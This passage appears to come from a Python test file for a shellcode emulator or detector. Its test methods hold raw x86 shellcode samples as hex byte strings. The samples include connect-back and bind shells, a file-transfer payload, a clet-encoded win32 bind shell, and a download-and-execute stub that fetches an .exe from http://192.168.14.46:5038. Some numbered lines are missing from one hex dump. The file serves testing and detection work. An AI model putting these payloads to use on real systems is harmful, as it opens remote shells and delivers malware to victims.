b"\x6e\x0b\x2f\x49\xff\xd6\x6a\x06\x6a\x01\x6a\x02\xff\xd0\x89\x45" 458 | shellcode += b"\x08\x33\xc0\x50\x50\x50\xb8\x02\xff\xab\xfc\x80\xf4\xff\x50\x8b" 459 | shellcode += b"\xc4\x6a\x10\x50\xff\x75\x08\x53\x68\xa4\x1a\x70\xc7\xff\xd6\xff" 460 | shellcode += b"\xd0\x58\x53\x68\xa4\xad\x2e\xe9\xff\xd6\x6a\x10\xff\x75\x08\xff" 461 | shellcode += b"\xd0\x33\xc0\x50\x50\xff\x75\x08\x53\x68\xe5\x49\x86\x49\xff\xd6" 462 | shellcode += b"\xff\xd0\x8b\x4d\x08\x89\x45\x08\x51\xff\x55\x18\x81\xc4\xfc\xfe" 463 | shellcode += b"\xff\xff\x8b\xdc\x33\xc9\x51\xb1\xff\x51\x53\xff\x75\x08\xff\x55" 464 | shellcode += b"\x10\x85\xc0\x7e\x0a\x50\x53\xff\x75\x04\xff\x55\x0c\xeb\xe5\xff" 465 | shellcode += b"\x75\x08\xff\x55\x18\x57\x68\x5b\x4c\x1a\xdd\xff\xd6\xff\x75\x04" 466 | shellcode += b"\xff\xd0\x33\xc0\x50\xff\x75\x14\x57\x68\x98\xfe\x8a\x0e\xff\xd6" 467 | shellcode += b"\xff\xd0\x57\x68\xef\xce\xe0\x60\xff\xd6\xff\xd0\x65\x65\x65\x65" 468 | 469 | self.runShellcode(shellcode, 12) 470 | 471 | def testShellcode13(self): 472 | """ 473 | Lindau - linkbot connectback version 474 | """ 475 | 476 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x15\xb9\x8b\xe6\x13\x41\x81" 477 | shellcode += b"\xf1\x39\xe6\x13\x41\x5e\x80\x74\x31\xff\x17\xe2\xf9\xeb\x05\xe8" 478 | shellcode += b"\xe6\xff\xff\xff\x24\xcc\x73\x9c\x54\x27\x9c\x57\x1b\x9c\x67\x0b" 479 | shellcode += b"\xba\x9c\x6f\x1f\xff\x52\x17\x17\x17\x44\x41\x9c\x48\x2b\x9c\x4b" 480 | shellcode += b"\x2c\x6f\x14\xc8\x44\x9c\x4c\x37\x14\xc8\x44\x94\xd4\x13\x9c\x24" 481 | shellcode += b"\x14\xe0\x24\xde\xbb\x25\xdf\xd6\xd6\x12\x93\xd7\x62\xe1\x3c\xdd" 482 | shellcode += b"\x62\xfe\x4f\x3c\xcf\xc6\xfc\x49\x14\x49\x33\x14\xc8\x71\x9c\x1c" 483 | shellcode += b"\x9c\x49\x0b\x14\xc8\x9c\x13\x9c\x14\xd0\x49\x4c\xe8\xf7\x49\x7f" 484 | shellcode += b"\x24\x25\x17\x17\x7f\x60\x64\x25\x48\x43\xad\x85\x79\x13\x93\xe8" 485 | shellcode += b"\xc1\x9c\xef\x96\xfb\x17\x15\x17\x17\x9c\xfb\x44\x7d\x16\x7d\x15" 486 | shellcode += b"\xad\x94\x44\x94\x17\xe8\xc1\x44\x44\x7f\x29\x38\xce\xe9\x7f\x15" 487 | shellcode += b"\x17\x2b\x0e\x9c\xc3\x9c\xcf\x7d\x07\x45\x44\xad\x74\x27\x77\x4d" 488 | shellcode += b"\xe8\xc1\x47\xa3\x15\x47\x42\x44\xad\x17\x4f\x77\xf5\xe8\xc1\xa8" 489 | shellcode += b"\xbb\xbb\x11\x92\xe8\xf2\x6c\x79\x73\x65\x7a\x6c\x64\x6c\x6a\x64" 490 | shellcode += b"\x71\x66\x70\x6c\x62\x65\x7a\x71\x79\x71\x76\x76\x79\x6a\x71\x77" 491 | shellcode += b"\x65\x63\x7a\x75\x6f\x64\x62\x67\x69\x69\x68\x78\x65\x71\x7a\x6b" 492 | shellcode += b"\x75\x6f\x75\x67\x76\x72\x66\x67\x6b\x75\x6f\x6d\x6c\x79\x79\x67" 493 | shellcode += b"\x77\x78\x6f\x6d\x61\x6c\x72\x6c\x73\x70\x6a\x63\x64\x73\x6c\x6c" 494 | shellcode += b"\x73\x69\x67\x67\x6b\x66\x73\x71\x6c\x62\x6a\x6c\x71\x63\x76\x73" 495 | shellcode += b"\x6e\x78\x6f\x71\x72\x78\x6f\x76\x63\x73\x75\x70\x70\x6e\x62\x61" 496 | shellcode += b"\x76\x72\x70\x66\x63\x61\x6a\x66\x67\x76\x68\x76\x71\x7a\x63\x62" 497 | shellcode += b"\x7a\x63\x66\x65\x78\x6f\x6e\x68\x68\x61\x70\x66\x6a\x78\x67\x72" 498 | shellcode += b"\x6d\x68\x70\x6d\x75\x6c\x75\x62\x6d\x71\x7a\x72\x6d\x76\x63\x76" 499 | shellcode += b"\x73\x70\x6a\x79\x68\x61\x62\x63\x76\x76\x71\x68\x78\x63\x6b\x6f" 500 | shellcode += b"\x7a\x6a\x78\x68\x70\x6f\x76\x63\x66\x74\x61\x74\x71\x61\x66\x62" 501 | shellcode += b"\x74\x68\x67\x75\x61\x74\x72\x75\x6a\x68\x75\x63\x69\x72\x62\x6b" 502 | shellcode += b"\x6a\x67\x64\x70\x6c\x78\x67\x61\x71\x66\x7a\x67\x67\x71\x63\x6a" 503 | shellcode += b"\x62\x69\x79\x6a\x71\x76\x77\x66\x67\x7a\x74\x69\x72\x77\x6f\x63" 504 | shellcode += b"\x79\x7a\x8b\x45\x30\x05\x24\xfb\xff\xff\xff\xe0\xeb\xf4\x70\x75" 505 | shellcode += b"\x0b\x0b\x1b\x00\x6b\x6a\x69\x68\x74\x70\x6f\x66\x68\x6c\x65\x65" 506 | shellcode += b"\x77\x72\x61\x79\x78\x6b\x61\x76\x78\x77\x64\x71\x61\x71\x7a\x76" 507 | shellcode += b"\x77\x67\x62\x77\x65\x67\x6f\x66\x74\x74\x73\x6d\x77\x6f\x75\x6e" 508 | shellcode += b"\x62\x6d\x6f\x64\x73\x6d\x78\x6c\xeb\x06\x6d\x64\x59\x1c\x00\x01" 509 | shellcode += b"\x8b\x44\x24\xfc\x05\xe0\xfa\xff\xff\xff\xe0\x6d\x75\x6a\x64\x6b" 510 | shellcode += b"\x75\x63\x69\x77\x65\x63\x74\x61\x75\x64\x70\x73\x66\x68\x67\x69" 511 | shellcode += b"\x62\x67\x63\x75\x72\x66\x6a\x6a\x6e\x6e\x78\x72\x78\x66\x5c\x00" 512 | shellcode += b"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" 513 | shellcode += b"\x00\x00\x00\x00\x01\x00\x00\x00\x68\x1c\x09\x00\x01\x00\x00\x00" 514 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" 515 | 516 | self.runShellcode(shellcode, 13) 517 | 518 | def testShellcode14(self): 519 | """ 520 | Bremen - linkbot bind version 521 | """ 522 | 523 | shellcode = b"\x90\x90\x90\x90\xeb\x04\xff\xff\xff\xff\x90\x90\x90\x90\x90\x90" 524 | shellcode += b"\x90\x90\xeb\x04\xeb\x04\x90\x90\x90\x90\xeb\x04\xff\xff\xff\xff" 525 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 526 | shellcode += b"\x90\x90\x90\x90\xeb\x15\xb9\x8b\xe6\x13\x41\x81\xf1\x4d\xe6\x13" 527 | shellcode += b"\x41\x5e\x80\x74\x31\xff\x42\xe2\xf9\xeb\x05\xe8\xe6\xff\xff\xff" 528 | shellcode += b"\x71\x99\x26\xc9\x01\x72\xc9\x02\x4e\xc9\x32\x5e\xef\xc9\x3a\x4a" 529 | shellcode += b"\xaa\x07\x42\x42\x42\x11\x14\xc9\x1d\x7e\xc9\x1e\x79\x3a\x41\x9d" 530 | shellcode += b"\x11\xc9\x19\x62\x41\x9d\x11\xc1\x81\x46\xc9\x71\x41\xb5\x71\x8b" 531 | shellcode += b"\xee\x70\x8a\x83\x83\x47\xc6\x82\x37\xb4\x69\x88\x37\xab\x1a\x69" 532 | shellcode += b"\x9a\x93\xa9\x1c\x41\x1c\x66\x41\x9d\x24\xc9\x49\xc9\x1c\x5e\x41" 533 | shellcode += b"\x9d\xc9\x46\xc9\x41\x85\x1c\x19\xbd\xa2\x1c\x2a\x71\x70\x42\x42" 534 | shellcode += b"\x2a\x35\x31\x70\x1d\x16\xf8\xd0\x2c\x46\xc6\xbd\x94\xc9\xba\xc3" 535 | shellcode += b"\xae\x42\x40\x42\x42\xc9\xae\x11\x28\x43\x28\x40\xf8\xc1\x11\xc1" 536 | shellcode += b"\x42\xbd\x94\x11\x11\x11\x2a\x40\x42\xe2\xe1\xc9\x96\xc9\x9a\x28" 537 | shellcode += b"\x52\x10\x11\xf8\x42\xd2\xe4\x80\xbd\x94\x02\x12\x11\xf8\x38\x79" 538 | shellcode += b"\x31\xe3\xbd\x94\x12\x12\x11\xf8\x52\x91\x2b\x42\xbd\x94\xc9\x9a" 539 | shellcode += b"\x71\x82\x12\xf6\x40\x12\x17\x11\xf8\x42\x1a\x22\xa0\xbd\x94\xfd" 540 | shellcode += b"\x97\xa2\x84\x30\xbd\xa7\x6b\x63\x71\x6b\x62\x6e\x66\x66\x69\x64" 541 | shellcode += b"\x6d\x72\x64\x76\x77\x70\x6c\x72\x62\x61\x67\x6c\x66\x63\x62\x65" 542 | shellcode += b"\x76\x63\x77\x7a\x7a\x64\x77\x72\x6e\x61\x78\x71\x6c\x64\x70\x73" 543 | shellcode += b"\x6f\x62\x64\x71\x64\x77\x79\x71\x79\x69\x63\x69\x72\x69\x6b\x69" 544 | shellcode += b"\x75\x66\x64\x69\x73\x73\x62\x72\x6e\x6c\x72\x69\x6b\x72\x6e\x69" 545 | shellcode += b"\x61\x6d\x68\x79\x71\x68\x70\x68\x65\x63\x62\x7a\x74\x78\x72\x75" 546 | shellcode += b"\x6c\x74\x75\x6d\x79\x62\x6b\x67\x6c\x70\x61\x6a\x6b\x73\x75\x71" 547 | shellcode += b"\x61\x6b\x68\x6a\x65\x72\x67\x61\x6d\x72\x6c\x76\x70\x75\x79\x6a" 548 | shellcode += b"\x66\x69\x6f\x68\x7a\x72\x75\x79\x72\x6b\x70\x6e\x61\x6f\x70\x78" 549 | shellcode += b"\x7a\x76\x73\x66\x61\x62\x6e\x6d\x74\x6f\x63\x68\x68\x6a\x69\x63" 550 | shellcode += b"\x79\x64\x67\x62\x7a\x67\x66\x72\x66\x6f\x73\x7a\x6d\x73\x72\x74" 551 | shellcode += b"\x6d\x66\x6e\x6a\x6f\x76\x6a\x6a\x76\x66\x78\x6d\x78\x64\x76\x67" 552 | shellcode += b"\x73\x73\x6c\x64\x72\x66\x6f\x63\x6b\x68\x7a\x6f\x77\x6f\x71\x79" 553 | shellcode += b"\x62\x69\x6d\x77\x70\x73\x7a\x6c\x65\x72\x6c\x73\x61\x6d\x68\x76" 554 | shellcode += b"\x6e\x75\x65\x67\x76\x71\x75\x77\x71\x78\x6c\x6b\x64\x6b\x62\x75" 555 | shellcode += b"\x6d\x65\x8b\x45\x30\x05\x24\xfb\xff\xff\xff\xe0\xeb\xf4\x77\x75" 556 | shellcode += b"\x0b\x0b\x1b\x00\x77\x68\x72\x6e\x70\x76\x6c\x63\x61\x74\x78\x6f" 557 | shellcode += b"\x6a\x6d\x6b\x76\x6c\x6b\x6a\x7a\x63\x66\x63\x76\x64\x68\x75\x76" 558 | shellcode += b"\x79\x73\x78\x6b\x6e\x71\x6f\x7a\x68\x71\x62\x68\x6a\x74\x6b\x6e" 559 | shellcode += b"\x70\x6e\x78\x74\x6c\x77\x6b\x75\xeb\x06\x61\x69\x59\x1c\x00\x01" 560 | shellcode += b"\x8b\x44\x24\xfc\x05\xe0\xfa\xff\xff\xff\xe0\x62\x6c\x77\x66\x6e" 561 | shellcode += b"\x67\x6b\x6b\x62\x61\x6c\x6e\x69\x69\x73\x64\x73\x6d\x73\x61\x6b" 562 | shellcode += b"\x64\x66\x61\x7a\x6c\x71\x74\x70\x61\x61\x74\x66\x69\x78\x5c\x00" 563 | shellcode += b"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" 564 | shellcode += b"\x00\x00\x00\x00\x01\x00\x00\x00\x68\x1c\x09\x00\x01\x00\x00\x00" 565 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" 566 | shellcode += b"\x01\x00\x00\x00\x01\x00\x00\x00\x07\x00" 567 | 568 | self.runShellcode(shellcode, 14) 569 | 570 | def testShellcode15(self): 571 | """ 572 | Halle - filetransferr via csend 573 | """ 574 | 575 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x02" # 0x0440 ........ ........" 576 | shellcode += b"\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x31\xc9\x66\xb9\x86\x06\x80\x73" # 0x0450 .......[ 1.f....s" 577 | shellcode += b"\x0e\xd4\x43\xe2\xf9\x3d\x8b\xd5\xd4\xd4\x8f\x82\x83\x84\x3c\x67" # 0x0460 ..C..=.. ......++" 647 | shellcode += b"\x2b\x5d\x57\x57\xd5\xd4\xd4\x8c\x5f\x47\x57\xd5\xd4\xd4\x86\xbc" # 0x08c0 +]WW.... _GW....." 648 | shellcode += b"\xd5\xd5\xd4\xd4\xea\x2b\x87\x95\xe9\xd4\xd4\xd4\xd4\xdb\x51\x31" # 0x08d0 .....+.. ......Q1" 649 | shellcode += b"\x2b\x2b\x2b\xbc\xd2\xd4\xd4\xd4\xbc\xd5\xd4\xd4\xd4\xbc\xd6\xd4" # 0x08e0 +++..... ........" 650 | shellcode += b"\xd4\xd4\xea\x2b\x87\x91\xe9\x2b\x2b\x2b\x2b\xdb\x50\x36\x2b\x2b" # 0x08f0 ...+...+ +++.P6++" 651 | shellcode += b"\x2b\x5d\x57\x2c\xd4\xd4\xd4\x83\x84\x87\x59\x47\xab\xd5\xd4\xd4" # 0x0900 +]W,.... ..YG...." 652 | shellcode += b"\x12\xd6\xc2\x86\x59\x47\x28\xd4\xd4\xd4\xb2\x13\xd6\xd6\xd4\xb2" # 0x0910 ....YG(. ........" 653 | shellcode += b"\x5f\xaf\xdc\xb2\x5d\xae\xd6\x5f\xaf\xd0\x5d\xae\xd0\x86\x5f\x57" # 0x0920 _...].._ ..]..._W" 654 | shellcode += b"\x2c\xd4\xd4\xd4\x84\xea\x2b\x87\x9d\xe9\xd4\xd4\xd4\xd4\xdb\x58" # 0x0930 ,.....+. .......X" 655 | shellcode += b"\x12\x2b\x2b\x2b\x8f\x8c\x8b\x84\x6c\xd4\xc4\xd4\xd4\x3c\x01\xd4" # 0x0940 .+++.... l....<.." 656 | shellcode += b"\xd4\xd4\xe9\xd4\xd4\xd4\xd4\xdb\x50\x3e\x2b\x2b\x2b\x5d\x57\xb4" # 0x0950 ........ P>+++]W." 657 | shellcode += b"\xd5\xd4\xd4\x8c\x3c\xed\xd4\xd4\xd4\x3c\x0c\xd4\xd4\xd4\x3c\x83" # 0x0960 ....<... .<....<." 658 | shellcode += b"\xd4\xd4\xd4\x3c\xcb\xd5\xd4\xd4\x17\x5f\x57\x2c\xd4\xd4\xd4\x84" # 0x0970 ...<.... ._W,...." 659 | shellcode += b"\xea\x2b\x87\x81\x5f\x57\x7f\xd5\xd4\xd4\x94\x5d\x57\x7f\xd5\xd4" # 0x0980 .+.._W.. ...]W..." 660 | shellcode += b"\xd4\xe9\xd1\xd4\xd4\xd4\xdb\x50\xd1\xd4\xd4\xd4\x3d\x96\x2b\x2b" # 0x0990 .......P ....=.++" 661 | shellcode += b"\x2b\x17\xbc\xd4\xd4\xd4\xd4\xbc\xd0\xd4\xd4\xd4\x59\x47\x53\xd5" # 0x09a0 +....... ....YGS." 662 | shellcode += b"\xd4\xd4\x86\x5f\x47\x2c\xd4\xd4\xd4\x86\xea\x2b\x87\x99\xe9\xd5" # 0x09b0 ..._G,.. ...+...." 663 | shellcode += b"\xd4\xd4\xd4\xdb\x58\x64\x2b\x2b\x2b\x17\x83\x82\x5f\x6f\x53\xd5" # 0x09c0 ....Xd++ +..._oS." 664 | shellcode += b"\xd4\xd4\x5f\x67\x5f\xd5\xd4\xd4\xed\x23\x8a\x8b\xdb\x50\xe6\xd4" # 0x09d0 .._g_... .#...P.." 665 | shellcode += b"\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xc4\xd4\xd4\x5f\x47\xb4\xd5" # 0x09e0 ........ ...._G.." 666 | shellcode += b"\xd4\xd4\x86\x5f\x47\x2c\xd4\xd4\xd4\x86\xea\x2b\x87\x99\xe9\xd5" # 0x09f0 ..._G,.. ...+...." 667 | shellcode += b"\xd4\xd4\xd4\xdb\x58\xa4\x2b\x2b\x2b\xd5\x57\x5f\xd5\xd4\xd4\x3d" # 0x0a00 ....X.++ +.W_...=" 668 | shellcode += b"\x84\xd4\xd4\xd4\x3c\xba\xd4\xd4\xd4\x84\x5f\x57\x2c\xd4\xd4\xd4" # 0x0a10 ....<... .._W,..." 669 | shellcode += b"\x84\xea\x2b\x87\x81\x8c\x17\x5d\x13\x84\xea\x2b\x47\x43\xd4\xd4" # 0x0a20 ..+....] ...+GC.." 670 | shellcode += b"\xd4\x8b\x84\x83\xbc\xd4\xd4\xd4\xd4\x84\xea\x2b\x47\x47\xd4\xd4" # 0x0a30 ........ ...+GG.." 671 | shellcode += b"\xd4\x8b\x8b\x8b\x8c\x17\x59\x47\xb0\xd5\xd4\xd4\x86\x59\x47\xb8" # 0x0a40 ......YG .....YG." 672 | shellcode += b"\xd5\xd4\xd4\x86\xea\x2b\x47\x53\xd4\xd4\xd4\x8b\x8b\x5d\x57\xbc" # 0x0a50 .....+GS .....]W." 673 | shellcode += b"\xd5\xd4\xd4\x17\x2b\x67\xbc\xd5\xd4\xd4\x84\xbc\xd5\xd4\xd4\xd4" # 0x0a60 ....+g.. ........" 674 | shellcode += b"\x5f\x47\xb4\xd5\xd4\xd4\x86\xea\x2b\x47\x5b\xd4\xd4\xd4\x8b\x8b" # 0x0a70 _G...... +G[....." 675 | shellcode += b"\x8b\x8b\x3d\x97\x2b\x2b\x2b\x5f\x47\xbc\xd5\xd4\xd4\x86\xea\x2b" # 0x0a80 ..=.+++_ G......+" 676 | shellcode += b"\x47\x5f\xd4\xd4\xd4\x8b\x17\x84\x59\x57\xd8\xd5\xd4\xd4\x84\x59" # 0x0a90 G_...... YW.....Y" 677 | shellcode += b"\x57\xc8\xd5\xd4\xd4\x84\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4" # 0x0aa0 W....... ........" 678 | shellcode += b"\xbc\xfc\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc" # 0x0ab0 ........ ........" 679 | shellcode += b"\xd4\xd4\xd4\xd4\x59\x57\xb8\xd5\xd4\xd4\x84\xbc\xd4\xd4\xd4\xd4" # 0x0ac0 ....YW.. ........" 680 | shellcode += b"\xea\x2b\x47\x38\xd4\xd4\xd4\x8c\x17\x3c\x7d\x2b\x2b\x2b\xbc\xd4" # 0x0ad0 .+G8.... .<}+++.." 681 | shellcode += b"\xd4\xd4\xd4\x2b\x47\x3c\xd4\xd4\xd4\x44\xd4\x00\x5c\x00\x43\x00" # 0x0ae0 ...+G<.. .D..\.C." 682 | shellcode += b"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00" # 0x0af0 $.\.1.2. 3.4.5.6." 683 | shellcode += b"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00" # 0x0b00 1.1.1.1. 1.1.1.1." 684 | shellcode += b"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00" # 0x0b10 1.1.1.1. 1.1.1..." 685 | shellcode += b"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" # 0x0b20 d.o.c... ........" 686 | shellcode += b"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00" # 0x0b30 ...0.-. .....*.." 687 | shellcode += b"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00" # 0x0b40 ........ (......." 688 | shellcode += b"\x07\x00\x00\x00\x00\x00\x00\x00" 689 | 690 | self.runShellcode(shellcode, 15) 691 | 692 | def testShellcode16(self): 693 | """ 694 | Tills neuer 695 | """ 696 | 697 | shellcode = b"\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03" # 0x0020 .T.u<.t5 x..V.v ." 698 | shellcode += b"\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74" # 0x0030 .3.IA.3. 6...(8.t" 699 | shellcode += b"\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e" # 0x0040 ......@. .;.u.^.^" 700 | shellcode += b"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03" # 0x0050 $..f..K. ^......." 701 | shellcode += b"\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c" # 0x0060 ..urlmon .dll.C:\" 702 | shellcode += b"\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40" # 0x0070 U.exe.3. d.@0x..@" 703 | shellcode += b"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c" # 0x0080 ..p...@. ...@4.@|" 704 | shellcode += b"\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec" # 0x0090 .@<...N. ........" 705 | shellcode += b"\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f" # 0x00a0 ..,$<... P.6./p.o" 706 | shellcode += b"\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb" # 0x00b0 ....T$.. R.3.SSR." 707 | shellcode += b"\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83" # 0x00c0 $S..]... ...S...." 708 | shellcode += b"\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\xef\xce\xe0\x60\xe8\x40\xff" # 0x00d0 ...,$b.. ....`.@." 709 | shellcode += b"\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff\x68\x74\x74\x70\x3a\x2f" # 0x00e0 ..R..... ..http:/" 710 | shellcode += b"\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x2e\x34\x36\x3a\x35" # 0x00f0 /192.168 .14.46:5" 711 | shellcode += b"\x35\x30\x33\x38\x2f\x6d\x64\x6e\x65\x78\x2e\x65\x78\x65\x00\x00" # 0x0100 5038/mdn ex.exe.." 712 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0110 ........ ........" 713 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0120 ........ ........" 714 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0130 ........ ........" 715 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0140 ........ ........" 716 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0150 ........ ........" 717 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0160 ........ ........" 718 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0170 ........ ........" 719 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 0x0180 ........ ........" 720 | 721 | self.runShellcode(shellcode, 16) 722 | 723 | def testShellcode17(self): 724 | """ 725 | win32_bind pex & ./clet -S win32_bind_pex -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123 726 | """ 727 | 728 | shellcode = b"\x56\x4F\x4C\x41\x54\x49\x4C\x49\x54\x49\x45\x53\x52\x45\x43\x45" 729 | shellcode += b"\x44\x45\x44\x42\x45\x4C\x4C\x4D\x41\x4E\x54\x52\x41\x44\x49\x54" 730 | shellcode += b"\x49\x4F\x4E\x53\x45\x58\x41\x4D\x49\x4E\x45\x44\x55\x50\x52\x4F" 731 | shellcode += b"\x4F\x54\x53\x50\x41\x52\x4C\x4F\x52\x53\x45\x58\x43\x45\x4C\x4C" 732 | shellcode += b"\x45\x4E\x43\x45\x4C\x41\x42\x53\x44\x45\x45\x50\x45\x4E\x53\x52" 733 | shellcode += b"\x41\x44\x49\x41\x4E\x54\x46\x52\x45\x53\x48\x57\x41\x54\x45\x52" 734 | shellcode += b"\x53\x55\x53\x50\x45\x43\x54\x49\x4E\x47\x42\x52\x4F\x49\x4C\x53" 735 | shellcode += b"\x42\x41\x44\x47\x45\x52\x49\x4E\x47\x4D\x41\xEB\x32\x59\x31\xC0" 736 | shellcode += b"\xB0\x5C\x8B\x11\x81\xEA\xC1\x58\x63\x43\x81\xC2\x8D\xED\x76\x39" 737 | shellcode += b"\x81\xF2\x74\x22\x74\x71\xC1\xC2\x0F\xC1\xC2\x15\x89\x11\x81\xE9" 738 | shellcode += b"\xFE\xFF\xFF\xFF\x41\x41\x2C\x01\x48\x48\x48\x74\x07\xEB\xD3\xE8" 739 | shellcode += b"\xC9\xFF\xFF\xFF\x1B\x8A\xD8\x59\x33\x48\x78\x88\xBF\x98\x84\x8E" 740 | shellcode += b"\x50\x30\xF1\x6E\xF9\x8B\x34\x53\xEE\x78\x26\xA8\x23\x91\x94\xD3" 741 | shellcode += b"\x12\xD8\x75\x8C\x83\x90\xAA\x05\x36\x8C\x1A\x53\x27\xC7\x0D\xD7" 742 | shellcode += b"\x8B\xCE\xB4\x8F\xF8\x8D\x7A\x02\x86\x8E\xD4\x13\x3C\x8B\x5A\xC7" 743 | shellcode += b"\x92\xFB\xD6\xEE\x3E\x06\x27\xD4\x84\xAA\x96\x87\x94\x9A\x24\x1C" 744 | shellcode += b"\x37\x41\xE1\xC9\x4B\x98\x7A\x62\x86\x8E\x04\x55\xBC\x8E\xAE\xBF" 745 | shellcode += b"\xB9\xED\xB2\xFD\xB4\x8C\xDA\x3F\x3A\xBC\x53\xD5\x90\x8B\x27\x45" 746 | shellcode += b"\xAC\x02\xB2\xBF\xB8\x8E\x6A\x14\xC5\x94\x6A\xD3\xD4\x81\x7C\x8F" 747 | shellcode += b"\xD8\xBE\x64\xF2\x63\x69\x2D\x02\xFA\x10\x42\x78\x6A\x0F\x3E\x98" 748 | shellcode += b"\x39\xD1\x65\xFA\x2A\xBB\xA4\x8C\x77\xD1\x05\xBA\x09\x37\x05\x05" 749 | shellcode += b"\xCC\x88\x42\x27\x19\x21\x73\x5C\x01\x71\xD7\x17\xD3\x54\x70\x5C" 750 | shellcode += b"\xB1\x11\x30\x72\xA9\x11\x2F\x42\xA8\xD1\x65\x3A\xFA\xF0\xA3\x72" 751 | shellcode += b"\xAA\x71\x5A\x6D\xFD\x40\xC9\x66\x6B\x5A\x70\x0C\x21\x01\x54\x72" 752 | shellcode += b"\xE9\x07\xE8\x65\xCE\xE4\xD0\x4D\xE9\x67\x38\x82\xE9\x07\xE8\x65" 753 | shellcode += b"\x12\x63\xDB\x63\xE9\x67\x68\x82\x39\x31\x70\x4C\xB1\x85\xEC\x0C" 754 | shellcode += b"\x5B\x7A\xED\xA1\x63\x39\x70\xFC\x61\xA0\x1C\x15\xFA\x10\x8D\x75" 755 | shellcode += b"\x4C\xA8\x5C\xA2\x09\xBD\xD6\x9F\x22\x41\xCF\x7F\x92\xFB\x36\x2C" 756 | shellcode += b"\xDE\x27\x8F\xB9\xA3\xC2\x30\xEE\x1C\x80\xB1\xE1\x2E\x85\x3C\xC4" 757 | shellcode += b"\xB3\x63\x74\xEC\x3B\xD2\x05\x5A\x69\x21\x50\xC2\x89\xA1\x4C\x27" 758 | shellcode += b"\x89\x31\x50\x22\x83\x89\x8C\x01\x51\xDE\x36\xA2\x63\xA9\x6C\xFC" 759 | shellcode += b"\x73\xCB\x65\xFA\x6C\xC1\x35\xBF\x40\xD0\x05\x4A\xE9\x07\xE8\x35" 760 | shellcode += b"\x23\x47\x73\x12\xE9\x67\x78\x3C\x81\xFE\x62\x17\xAF\x96\x69\x92" 761 | shellcode += b"\x43\x42\x42\x41\x42\x43\x43\x43\x41\x41\x42\x42\x42\x43\x41\x43" 762 | shellcode += b"\x43\x41\x43\x41\x42\x43\x41\x41\x43\x41\x43\x42\x43\x41\x41\x43" 763 | shellcode += b"\x43\x43\x43\x41\x41\x42\x43\x41\x41\x43\x43\x41\x43\x43\x43\x43" 764 | shellcode += b"\x43\x43\x03\x43" 765 | 766 | self.runShellcode(shellcode, 17) 767 | 768 | def testShellcode18(self): 769 | """ 770 | clet decoded nop slide (144 0x90 decoded with ./clet -S 144nop -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123) 771 | """ 772 | 773 | shellcode = b"\x43\x41\x50\x53\x50\x45\x43\x49\x41\x4C\x49\x53\x54\x53\x41\x43" 774 | shellcode += b"\x43\x45\x53\x53\x49\x4E\x47\x41\x4D\x42\x4C\x45\x44\x41\x4D\x45" 775 | shellcode += 